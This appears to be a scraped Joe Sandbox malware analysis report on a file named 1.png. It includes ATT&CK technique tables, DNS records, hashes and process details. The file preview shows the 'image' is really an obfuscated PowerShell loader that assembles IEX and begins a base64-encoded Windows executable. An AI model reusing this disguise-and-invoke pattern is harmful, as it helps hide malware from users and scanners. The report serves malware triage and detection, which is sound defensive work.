Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\Assets\PaintIcons.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\Assets\PaintIcons.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\Assets\PaintIcons.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\Assets\PaintIcons.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeQueries volume information: C:\Windows\Fonts\SegUIVar.ttf VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
DLL Side-Loading
LSASS Memory11
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
1.png21%ReversingLabsScript.Trojan.Heuristic
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
ax-0001.ax-msedge.net
150.171.28.10
truefalse
    high
    fp2e7a.wpc.phicdn.net
    192.229.221.95
    truefalse
      high
      tse1.mm.bing.net
      unknown
      unknownfalse
        high
        No contacted IP infos
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1586015
        Start date and time:2025-01-08 16:15:58 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 11s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
        Number of analysed new started processes analysed:39
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:1.png
        Detection:MAL
        Classification:mal48.winPNG@1/1@1/0
        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 204.79.197.203, 2.23.227.198, 2.23.227.221, 2.23.227.199, 2.23.227.222, 2.23.227.208, 23.44.203.211, 23.56.254.164, 20.12.23.50, 20.103.156.88, 20.190.160.22
        • Excluded domains from analysis (whitelisted): www.bing.com, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, fd.api.iris.microsoft.com, a-0003.a-msedge.net, oneocsp-microsoft-com.a-0003.a-msedge.net, ctldl.windowsupdate.com, oneocsp.microsoft.com, www-www.bing.com.trafficmanager.net, x1.c.lencr.org, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, mm-mm.bing.net.trafficmanager.net, res.public.onecdn.static.microsoft, ocsp.edge.digicert.com, c.pki.goog
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: 1.png
        No simulations
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        fp2e7a.wpc.phicdn.netatomxml.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
        • 192.229.221.95
        TR98760H.exeGet hashmaliciousAgentTeslaBrowse
        • 192.229.221.95
        Payment-Order #24560274 for 8,380 USD.exeGet hashmaliciousXWormBrowse
        • 192.229.221.95
        invoice-1623385214.pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
        • 192.229.221.95
        PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
        • 192.229.221.95
        invoice-1623385214 pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
        • 192.229.221.95
        0a0#U00a0.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
        • 192.229.221.95
        3e18bdf74f3caef770a7edcf748bdaf0e6a4a21664e69.exeGet hashmaliciousAsyncRAT, GhostRatBrowse
        • 192.229.221.95
        xmr.exeGet hashmaliciousUnknownBrowse
        • 192.229.221.95
        sasdriver_2.0.20.119.exe_MDE_File_Sample_dc3db78edf1ce84f101e976a9966edb4cf6dcd75.zipGet hashmaliciousUnknownBrowse
        • 192.229.221.95
        ax-0001.ax-msedge.nethttps://u18282959.ct.sendgrid.net/ls/click?upn=u001.rEMfFlpAoJgeimh0eSdetqZJOaDEFgZEM86yJv-2FFqn4BDVcYSBJ7qe3MiIpMf7EHr39f_olH575WPuDKQ6-2BlwfkTb3bEPQyZlspfhjzLUkESeUKdz-2BSLVmhS-2BiNhtE4sjBDlEtszfbsE5c6igxavK3muY3tYeP6QkmX-2BJi-2BaLU6j8Wsp6hQUS9QOYhOuxeiGpmu9xPXTXniG-2FhK47xPzbY2a7dAVr4WH1EaPd9qfgngR-2BS0-2BE0l9vGYKsxljCm-2F3LXvjLQIge-2FSmK3YEyKDG8HCxUjDZIuKEbjKZRrfVUUqiw37aYZrphVQ5WvB0QOlR-2Be2shKtaVihd3RfTtBEd0NyHk9A-3D-3DGet hashmaliciousUnknownBrowse
        • 150.171.27.10
        https://www.dollartip.info/unsubscribe/?d=mdlandrec.netGet hashmaliciousUnknownBrowse
        • 150.171.28.10
        mail (4).emlGet hashmaliciousUnknownBrowse
        • 150.171.27.10
        https://link.edgepilot.com/s/692fcd16/rcPy0yXyykq_mRLKroUvRQ?u=https://petroleumalliance.us8.list-manage.com/track/click?u=325f73d29a0b4f85a46b700a9%26id=dfe369da82%26e=94c2db4428Get hashmaliciousUnknownBrowse
        • 150.171.27.10
        https://www.kentuckyfriedsalmonpadon.com/caHbBZmGet hashmaliciousUnknownBrowse
        • 150.171.27.10
        Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
        • 150.171.27.10
        PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
        • 150.171.27.10
        https://www.figma.com/design/Sw6t5vElBVmnrFNiteka8B/Untitled-(Copy)?node-id=0-1&p=f&t=x9aFU3FgLH1rkKBK-0Get hashmaliciousUnknownBrowse
        • 150.171.27.10
        https://czfc104.na1.hubspotlinks.com/Ctc/RI+113/cZFc104/VVpBhY3Y-LTWW3Cvl9B8hKRPtVVm64t5qdmRWN1f4_WP7mt9FW50l5tj6lZ3lNW8SvDYK4v65T-W5VNxKh8dLcmKW1GlXcL834zD3W5w7v_71CDbKVV4Dsjr5FnQ2PVSHlbR3pc5MwW72kzKm6WrbY7W6NJh0_7GRxDMW2K2WDT2ZPr4xW3b_gtn2bnp5xW7Hn0F58SN9mqN4_D9_QrtgD8VBy-hV2j1qrbW3N54fh8gXkqCW6JcyP11p5DmRW6d2nj72MkQXgW6hgqJx7Gc_ycW5DT-Pm451FQhW4Tph0s8GNtc-W58sq8G9dpW27W5S3wzf7rNLv_Vn6h606T2B8YN4yb6VRDg_G5W36Gvt_2lnk9qW2LykX37R4KRSW1F2tHT3jrLyjW7hSkG572MN4TW75KrBz5T-zFkVLJYW27hKs9nW3h3Pmh907wxLW2Zzdnn98hQC7W2Qnk7D31ZBJjW83tNvQ2nNht5W1HJvHm95P722W55gfDx9lT1vDW1ykGr_219m_RW5ff63S7MhCcQW4_QfK_5TQdprVlF4dm2DH-ctW6mF-BW36YwwNW99r61n6mmMhVW2v1J7Q5mVXz2W53lcRT6L4fsVN8gyZcXY0MfLW2kLwLd1TYk1wW7MzDQt4QNh6nW1bMMpS84VG-SW6F_Tym5bK06Qf6rQzB604Get hashmaliciousUnknownBrowse
        • 150.171.28.10
        https://www.earthsatellitemaps.co/esmrel/landing.php?uid=0&lid=0&sid=531485973&sid2=1361197931118060&sid3=&sid4=google%20maps%20pro&sid5=&sid6=&sid7=&sid8=&rid=&_agid=0&aid=0&r=657&_agid=73407&msclkid=8b3e7b2e92fe1f072cfc1c5c7ae3c44dGet hashmaliciousUnknownBrowse
        • 150.171.28.10
        No context
        No context
        No context
        Process:C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:dropped
        Size (bytes):1548
        Entropy (8bit):5.261505195890021
        Encrypted:false
        SSDEEP:48:0uPAiSmXySNS3RzE347RTzk0uS3RzE347RTzGz0BSkuHSw3R:0EAiSmiSNS3RzogRHwS3RzogRHGISdHR
        MD5:CFCDEF71C3A24E391B1AEDF8DFC37167
        SHA1:F9951FB875628FA24232A85642DED621F111BB0E
        SHA-256:18024BB01E466A6C5422E7F390CCED55DB131AACC9AB29B4CED8FD64CC0004A8
        SHA-512:70713049996137B56131D2FEB507B584D8AB7C8E0CAC6FE9C3E84FD57C64B6BFBD18E677F719DCF4AAED954B68A9B4ECF514A9362E3006F4A0DCB63238274000
        Malicious:false
        Reputation:low
        Preview:..**************** Started trace for Module: [sti.dll] in Executable [mspaint.exe] ProcessID: [6668] at 2025/01/08 10:16:50:874 ****************..WIA: 6668.6700 47 0 0 [sti.dll] AsyncRPCEventTransport::OpenConnectionToServer, AsyncRPC Connection established to server..WIA: 6668.6700 78 0 0 [sti.dll] AsyncRPCEventTransport::OpenConnectionToServer, Got my context 0000016E8BB4F020 from server...WIA: 6668.6700 78 0 0 [sti.dll] WiaEventReceiver::Start, WiaEventReceiver Started.....WIA: 6668.6700 78 0 0 [sti.dll] AsyncRPCEventTransport::SendRegisterUnregisterInfo, Sent RPC Register/Unregister information...WIA: 6668.6700 78 0 0 [sti.dll] WiaEventReceiver::SendRegisterUnregisterInfo, Added new registration:..WIA: 6668.6700 78 0 0 [sti.dll] EventRegistrationInfo::Dump, dwFlags: 0x00000000, guidEvent: {A28BBADE-64B6-11D2-A231-00C04FA31809}, bstrDeviceID: *, callback: 0x0000016E8BA321C0..WIA: 6668.6700 78 0 0 [sti.dll] AsyncRPCEventTransport::SendRegisterUnregisterInfo, Sent RPC Register/Unregis
        File type:ASCII text, with very long lines (65461), with CRLF line terminators
        Entropy (8bit):5.0698319105078795
        TrID:
          File name:1.png
          File size:115'261 bytes
          MD5:8df4ac24ea37d95679dda12bbdf3d021
          SHA1:8c7881e04b2ec0e4f352e531ad02a31e79a36b53
          SHA256:1417811e6df4fa655aa70a388473d57e529526674011fd60a1ea56b86684118b
          SHA512:692b3c8d8aaa9e9f96e5d3a8e58ded31546e26a9f39f4b8ef25d44dafc2616eaa980913e4597a1b16db5eb7127667ed7967844558b8c61818e903220decb87a8
          SSDEEP:3072:kvUixeAKzAgnV8519yuKXwB4c4K15IiTksfUXLID5uzynrKMkHckRJs9Skjugil6:yeAKzAgnVwyuKXwB4c4K15IiTksfUXLW
          TLSH:C5B31A321103BD8EABBF2E45A9002DA04CDC65779B459548FDC906FA96BB9148F3DEB0
          File Content Preview:ipconfig /flushdns...... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$JOOOO="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQ
          TimestampSource PortDest PortSource IPDest IP
          Jan 8, 2025 16:16:47.683451891 CET6174553192.168.2.241.1.1.1
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Jan 8, 2025 16:16:47.683451891 CET192.168.2.241.1.1.10x6278Standard query (0)tse1.mm.bing.netA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Jan 8, 2025 16:16:45.796308041 CET1.1.1.1192.168.2.240xfe81No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
          Jan 8, 2025 16:16:45.796308041 CET1.1.1.1192.168.2.240xfe81No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
          Jan 8, 2025 16:16:47.690665007 CET1.1.1.1192.168.2.240x6278No error (0)tse1.mm.bing.netmm-mm.bing.net.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
          Jan 8, 2025 16:16:47.690665007 CET1.1.1.1192.168.2.240x6278No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
          Jan 8, 2025 16:16:47.690665007 CET1.1.1.1192.168.2.240x6278No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false

          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Target ID:0
          Start time:10:16:49
          Start date:08/01/2025
          Path:C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe
          Wow64 process (32bit):false
          Commandline:mspaint.exe "C:\Users\user\Desktop\1.png"
          Imagebase:0x7ff64cd50000
          File size:4'328'960 bytes
          MD5 hash:ED77A474C513D8F7A1481EEB1C978AAB
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          No disassembly